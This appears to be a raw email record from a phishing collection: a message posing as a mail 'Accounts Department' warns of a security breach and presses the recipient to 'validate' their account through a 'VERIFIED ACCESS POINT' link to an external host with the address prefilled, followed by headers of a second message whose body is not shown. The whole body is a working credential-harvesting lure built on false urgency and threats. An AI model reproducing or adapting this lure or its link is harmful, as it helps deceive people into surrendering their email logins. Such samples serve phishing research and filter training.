From: Accounts Department<bzhang@issas.ac.cn>
Date: Wed, 28 Dec 2016 04:46:23 +0100
Reply-To: Accounts Department<bzhang@issas.ac.cn>
Message-Id: <20161228034431.7B247FE9AA@mail.mare.com>
X-RMX-ID: 20161228-044946-uBS3njZP031099-0@kdin01
X-RMX-TRACE: 2016-12-28 04:49:46 RmxMSO@kdin01/mailcc14 [0.1s] 20161228-044946-uBS3njZP031099-0@kdin01 0:00:00
X-RMX-TRACE: 2016-12-28 04:49:46 KdIn2013@kdin01/mailcc11 [0.2s] 20161228-044946-uBS3njZP031099-0@kdin01 0:00:00
Status: O
X-Status: 
X-Keywords:                  
X-UID: 483

You will not see this in a MIME-aware mail reader.
--===============2118041771==
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 Some Mails Are Not Reaching Your Mailbox, RESOLVE NOW.
 =

 =

 Dear jose@monkey.org; =

  Due to the recent mail account security breaches that affected most email=
 account providers, we noticed your mailbox was among the affected. =

 We remain vigilant in protecting our personal information so as part of ou=
r effort to improve your experience with our service,
 we updated our SSL encryption Standard and advised all users/staffs to val=
idate their email account by following the below VERIFIED ACCESS POINT to a=
void email theft/losing of your email account. =

 =

 VERIFIED ACCESS POINT to secure account and privacy automatically.
 =

 Failure to comply automatically puts your account in danger and off our ma=
iling lists.
 This notification was sent by Mail Account Administration =96
 All Rights Reserved!
 =20
--===============2118041771==
Content-Type: text/html; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<html>
<head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dutf=
-8"/>
	<title></title>
</head>
<body>
<p><b>Some Mails Are Not Reaching Your Mailbox, RESOLVE NOW.</b></p>

<p><br/>
<br/>
<span style=3D"color: rgb(34, 34, 34); font-size: 12.8px; font-family: Taho=
ma;"><font size=3D"2">Dear jose@monkey.org; =

</font></span></p>

<div>
<p><span style=3D"color: rgb(34, 34, 34); font-size: 12.8px; font-family: T=
ahoma; background-color: rgb(255, 255, 255);"><font size=3D"2">Due to the r=
ecent mail account security breaches that affected most email account provi=
ders, we noticed your mailbox was among the affected. <br/> =

We remain vigilant in protecting our personal information so as part of our=
 effort to improve your experience with our service,<br/>
we updated our SSL encryption Standard and advised all users/staffs to vali=
date their email account by following the below VERIFIED ACCESS POINT to av=
oid email theft/losing of your email account. </font></span></p>

<p><br/>
<span style=3D"color: rgb(34, 34, 34); font-size: 12.8px; font-family: Taho=
ma; background-color: rgb(255, 255, 255);"><font size=3D"2"><a href=3D"http=
://ror.ranksol.com/haider/fnk/datacase/Nwebmail/index.php?email=3Djose@monk=
ey.org" style=3D"color: rgb(17, 85, 204);" target=3D"_blank">VERIFIED ACCES=
S POINT</a> to secure account and privacy automatically.</font></span><br/>
 </p>

<p><span style=3D"color: rgb(34, 34, 34); font-size: 12.8px; font-family: T=
ahoma; background-color: rgb(255, 255, 255);"><font size=3D"2">Failure to c=
omply automatically puts your account in danger and off our mailing lists.<=
br/>
This notification was sent by Mail Account Administration =E2=80=93<br/>
All Rights Reserved!</font></span></p>
</div>
</body>
</html>
--===============2118041771==--

From jose@monkey.org Thu Dec 29 01:49:34 2016 +0000
Return-Path: codewizard@approject.com
Delivered-To: jose@monkey.org
X-FDA: 72342961068.08.pig96_194e64ef2a359
X-Spam-Summary: 60,1,0,dc14adc305596aa4,d41d8cd98f00b204,codewizard@approject.com,:,RULES_HIT:41:72:327:355:379:455:800:871:967:973:978:983:988:989:1000:1001:1189:1197:1208:1260:1263:1308:1309:1313:1314:1345:1381:1390:1431:1432:1433:1434:1437:1516:1517:1545:1573:1575:1594:1685:1699:1730:1744:1747:1777:1792:1801:1803:2107:2194:2196:2198:2199:2200:2201:2393:2525:2527:2528:2553:2568:2610:2632:2636:2682:2685:2693:2737:2741:2859:2890:2891:2894:2895:2903:2909:2911:2915:2916:2917:2922:2923:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3154:3353:3552:3554:3770:3865:3866:3867:3868:3870:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4093:4242:4321:4365:4425:4605:4700:6248:6261:6354:6506:6650:6669:6678:6747:7208:7266:7281:7398:7774:7809:7875:7903:7909:8516:8518:8550:8568:8599:8603:8957:9025:9060:9074:9080:9121:9130:9153:9177:9388:9908:10030:10049:10346:11233:11473:11658:11845:11914:12043:12052:12438:12555:12729:12737:12740:12776:12812:128
X-HE-Tag: pig96_194e64ef2a359
X-Filterd-Recvd-Size: 43762
Received: from approject.com (mail.oharainteriors.com [64.122.131.26])
	by imf19.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu, 29 Dec 2016 01:49:33 +0000 (UTC)
